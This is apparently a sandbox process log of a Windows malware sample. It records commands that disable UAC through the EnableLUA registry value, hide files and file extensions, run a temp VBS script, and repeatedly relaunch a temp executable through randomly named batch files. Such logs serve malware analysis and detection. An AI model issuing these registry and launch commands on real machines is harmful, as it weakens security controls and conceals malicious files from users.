C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eQEocQkM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOIsIIwU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AkcsYsAY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LWAskwYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hWwgYkws.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NOEEIQEc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VOIocMYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vswwoQQg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYowYoQk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\coMsUQQQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YOMMEQQM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mkgsgMgI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yYoUwQYQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWoUEcQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IQAoUUcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xikEAsYk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\teMcAYUU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vWIccUws.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmMgUMgg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XkocwsII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tWQsoMgE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eaEccwMQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mmMwAgYM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iGMkMkcA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yAksgYEk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

